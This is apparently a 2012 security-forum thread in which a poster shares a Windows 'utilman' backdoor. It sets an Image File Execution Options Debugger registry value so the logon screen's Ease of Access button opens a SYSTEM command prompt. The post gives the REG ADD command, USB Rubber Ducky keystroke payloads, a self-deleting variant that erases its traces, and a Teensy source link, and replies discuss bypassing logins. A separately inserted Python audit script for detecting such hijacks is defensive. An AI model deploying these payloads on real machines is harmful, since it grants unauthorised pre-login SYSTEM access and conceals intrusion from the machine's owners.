PCFreak Posted February 9, 2012

Hi, I recently created a very nice utilman exploit that I would like to share with you. The difference to all other methods currently used with the Ducky is that my version does not need to change any system file. I just set a registry key and all is done. I will explain in detail here how it works.

The currently available utilman exploits using the Ducky change the user rights of utilman.exe so that it can be backed up and replaced with cmd.exe. This is a huge change to the system and it leaves a lot of traces. <_<

As described in this Microsoft article about "Launching the debugger automatically", you can set up your application to start Visual Studio when you launch the application from Windows. Visual Studio will load your application, ready for debugging, but will not commence debugging until you issue an execution command. Having Visual Studio launch the debugger in this way is useful for debugging services and COM out-of-proc servers.

Reading further in this article, you learn how to set up the system so that instead of the "real program" the debugger is executed. So let's apply that to the utilman exploit. We just need to tell the system to execute CMD.EXE instead of UTILMAN.EXE to be able to log on to the system just by clicking the "Ease of Access" button at the logon screen. Nothing is easier than that, just use this command (as an administrative user):

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f

That's all - try it out!
So one could now combine the already available payload for an administrative command prompt on Windows 7:

GUI
DELAY 50
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
DELAY 200

with this:

STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f
ENTER
STRING EXIT
ENTER

and now has the ability to log in to this system whenever he wants, just by clicking the "Ease of Access" button at the logon screen.

You could go one step further by using this code to add the registry key:

STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d "cmd.exe /c start """Utilman Exploit by PCFreak""" cmd.exe /s /k REG DELETE """HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe""" /f && @echo Enjoy!" /f
ENTER
STRING EXIT
ENTER

This does the same, but when using utilman.exe (press the EoA button on the lock screen) the opening command shell automatically removes its tracks from the registry and stays open, so after using the exploit it is not trackable any more.

Currently I cannot try this myself with the USB Rubber Ducky, since I have a German keyboard and with the Ducky it is still not possible to switch keyboard layouts, but the above code should work. I have working code and a demonstration video of how it works on my blog (blog.pcfreak.de). Here is the source code for the Teensy 2.0 board: http://blog.pcfreak.de/wp-content/upload/most_sophisticated_utilman_exploit.zip

I hope you find this sophisticated method interesting and have fun with it. ;)

Cheers
PCFreak
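The Debugger value PCFreak sets is also the artefact a defender should hunt for: Windows does not validate that the "debugger" is a debugger at all, it simply launches whatever the value names (with the original executable's path and arguments appended to the command line) in place of the hijacked program. Below is an added example, not code from PCFreak's post or his Teensy source: a small Python audit that parses a `reg export` of the Image File Execution Options key and reports every subkey carrying a Debugger value, treating the binaries reachable from the logon screen (utilman.exe, sethc.exe, osk.exe, narrator.exe, magnify.exe, displayswitch.exe, atbroker.exe) as high severity. The .reg text it scans is constructed for the example, not captured from a real host.

```python
"""Audit a `reg export` dump for Image File Execution Options (IFEO) Debugger
hijacks of the logon-screen accessibility binaries.

Added example, not code from the original thread. The input is a constructed
.reg-format text embedded below; a real `reg export` file is UTF-16LE with a
BOM, so open it with encoding="utf-16" before passing it to find_ifeo_hijacks().
Only REG_SZ values are parsed (a Debugger stored as REG_EXPAND_SZ shows up as
hex(2):... in a .reg file and is skipped by this parser).
"""
import re

IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
               r"\CurrentVersion\Image File Execution Options")

# Executables reachable from the logon/lock screen before any password is
# entered. A Debugger value under any of these yields a SYSTEM shell, which is
# exactly what the utilman.exe trick in the thread relies on.
ACCESSIBILITY_BINARIES = {
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}

_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
# "name"="data" with .reg escaping (backslash-quote and backslash-backslash)
_STR_VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"="(?P<data>(?:[^"\\]|\\.)*)"$')


def _unescape(s):
    # Undo .reg string escaping in one pass: each backslash-X pair becomes X.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the string values in a .reg dump."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = _STR_VALUE_RE.match(line)
        if m and current is not None:
            keys[current][_unescape(m.group("name"))] = _unescape(m.group("data"))
    return keys


def find_ifeo_hijacks(text):
    """Return [(target_exe, debugger_command, severity)] for every IFEO subkey
    that carries a Debugger value. HIGH = accessibility binary (pre-auth SYSTEM
    shell), REVIEW = any other executable (legitimate debuggers land here too)."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if not key.lower().startswith(IFEO_PREFIX.lower() + "\\"):
            continue
        target = key.rsplit("\\", 1)[1].lower()
        # Registry value names are case-insensitive, so match accordingly.
        debugger = next((d for n, d in values.items() if n.lower() == "debugger"), None)
        if debugger is None:
            continue
        severity = "HIGH" if target in ACCESSIBILITY_BINARIES else "REVIEW"
        findings.append((target, debugger, severity))
    return findings


# Constructed sample in `reg export` format (not captured from a real host).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe]
"Debugger"="cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="cmd.exe /c start \"shell\" cmd.exe /k REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Program Files\\Debugger\\vsjitdebugger.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"MinimumStackCommitInBytes"=dword:00008000
'''

if __name__ == "__main__":
    for target, debugger, severity in find_ifeo_hijacks(SAMPLE_EXPORT):
        print(f"[{severity}] {target}: Debugger = {debugger}")
```

Run it as-is to see the report on the constructed sample, or feed find_ifeo_hijacks() the text of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg` decoded as UTF-16. One caveat follows directly from the second payload above: the self-deleting variant removes the key the first time the EoA button is pressed, so an export taken afterwards is clean. Catching that variant needs write-time telemetry on the IFEO path, for example Sysmon event ID 13 (RegistryEvent, value set), rather than a periodic audit of the key.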
Xcellerator Posted February 9, 2012

I like it! I wrote the original payload for Utilman. I've never heard of this method before, but I really like the sound of it! Is cmd.exe still run with SYSTEM-level privileges, like Utilman.exe is, though? I doubt that the debugger would cause it not to, but that would really put a damper on the aim of the payload.
PCFreak (Author) Posted February 9, 2012

> I like it! I wrote the original payload for Utilman. I've never heard of this method before, but I really like the sound of it! Is cmd.exe still run with SYSTEM-level privileges, like Utilman.exe is, though? I doubt that the debugger would cause it not to, but that would really put a damper on the aim of the payload.

It runs as SYSTEM as utilman would. The system executes the debugger (which is now cmd.exe) as it would execute utilman! The replacement (debugger) runs in the same context as the executable would have run originally. Just try it out.

Cheers
PCFreak
Xcellerator Posted February 9, 2012

I have now. This is a great find! I'm sure people will be able to find many applications for this idea...
ZDavid Posted February 10, 2012

This is a great find! I like it. But it must be used while a user is logged in the first time. How can I bypass the login? That is, I want to use it when not logged in. Thanks.
PCFreak (Author) Posted February 10, 2012

> This is a great find! I like it. But it must be used while a user is logged in the first time. How can I bypass the login? That is, I want to use it when not logged in. Thanks.

The original utilman exploit is usually used to reset the password on Windows 7 machines by booting a Linux live CD, copying utilman.exe to utilman.bak, copying cmd.exe to utilman.exe and then rebooting. When pressing the EoA button you can reset the password in the opening system shell.

The goal of my payload was to show our employees in the "IT Security and Safety Training" what an attacker can do if he has 30 seconds of access to an unlocked Windows 7 machine. Believe me, showing them something is better than just telling them! And the USB Rubber Ducky is the ideal device to do so!

But the technique with the registry key could also be used for the password recovery purpose. Instead of making modifications to utilman.exe it would be easier to just offline-edit the registry to do the same. The nice thing about the registry method is that you could auto-delete the key on execution and the system works as it did before.

I am currently thinking about writing a small program for a live Windows PE CD and/or Linux that does exactly that. My idea is that you just execute

ResetPass [path to Software hive] [username] [new password]

So just calling

(Linux) ResetPass '/mnt/C/Windows/System32/config/software' "pcfreak" "changeme"
(Windows) ResetPass.exe 'X:\Windows\System32\config\software' "pcfreak" "changeme"

would place the correct command into the registry that needs to get executed to reset the password for user "pcfreak" to "changeme". After booting the system and pressing the EoA button you can log in with the new password. When I have the time to code this and it is working I will surely let you know.

Cheers
PCFreak
Xcellerator Posted February 10, 2012

Writing it for Linux I'm sure would be a very popular option, as I'm sure I'm not the only one who carries a bootable Linux distro on their USB...
Wario Posted February 12, 2012

Forgive me if this is a dumb question; I'm just getting started on this topic. However, are registry changes a standard permission for system-level users? I cannot change any registry keys on my workplace computer, so would this make the original Utilman exploit more suitable for the goal of adding an admin account without having prior admin access?
PCFreak (Author) Posted February 12, 2012

> Forgive me if this is a dumb question; I'm just getting started on this topic. However, are registry changes a standard permission for system-level users? I cannot change any registry keys on my workplace computer, so would this make the original Utilman exploit more suitable for the goal of adding an admin account without having prior admin access?

As a user you can only write to "your" part of the registry, which is "HKCU" (HKEY_CURRENT_USER). To be able to write to "HKLM" (HKEY_LOCAL_MACHINE) you need administrative rights. The original Utilman exploit also needs administrative rights or needs to be applied from an externally booted operating system, since it changes files in the Windows\system32 directory. The utilman exploit is not a "privilege escalation" exploit. If you have physical access to a machine (which you of course need to plug in the Ducky) you can always get access. The only way to avoid this is to always lock your machine when leaving it and fully encrypt your hard drive.

Concerning your workplace computer: maybe your administrator did the right thing and did not give you administrative rights, or you just did not start regedit (or whatever program you use to edit the registry) with administrative rights? I use the utilman exploit with the registry key only for the purpose of showing our employees how dangerous it is not to lock your machine.

Cheers
PCFreak
Xcellerator Posted February 12, 2012

If you can, try booting into a Linux distro and using an offline registry editor like chntpw. I know BackTrack comes with chntpw already available, or maybe even use the Offline NT Password and Registry Editor. Here is the link.
abs0lut3z33r0 Posted February 21, 2012

@PCFreak, which one do you recommend as a replacement for the USB Rubber Ducky? I find it costly. Is the Teensy fine for the payloads, or should I consider the 2.0 or the Teensy++? Are payloads compatible between different Teensy models?
PCFreak (Author) Posted February 21, 2012

> @PCFreak, which one do you recommend as a replacement for the USB Rubber Ducky? I find it costly. Is the Teensy fine for the payloads, or should I consider the 2.0 or the Teensy++? Are payloads compatible between different Teensy models?

I have a Teensy 2.0. It is enough for just emulating a HID device. It costs $16 and does exactly what it should. Btw. you can do much more with it, since it also has many I/O ports on it. The difference between the Teensy and the Ducky is that the Ducky is smaller and that the payload comes from the SD card. On the Teensy you have to plug in the Teensy to program it, and the payload is stored in the RAM on the Teensy. You have about 32K available. A normal payload takes about 4K. I recommend you read this page http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle and use Irongeek's "phukd" library to make it easier for you. It depends on you. If you understand a little bit about programming, then the Teensy is a good choice. If the Ducky were perfect (firmware + encoder) its price would be okay. At the moment it is too expensive, since the software for the Ducky is not very well programmed. If you have further questions just send me a PM.

Cheers
PCFreak
abs0lut3z33r0 Posted February 21, 2012

Thanks for your response, I am going with the Teensy for now.
skimpniff Posted February 21, 2012

> This is a great find! I like it. But it must be used while a user is logged in the first time. How can I bypass the login? That is, I want to use it when not logged in. Thanks.

This is my go-to. http://www.kryptoslogic.com/area02/item02/index.html
PCFreak (Author) Posted February 23, 2012

> This is my go-to. http://www.kryptoslogic.com/area02/item02/index.html

I know KonBoot. They had an episode about it on Hak5. - Nice!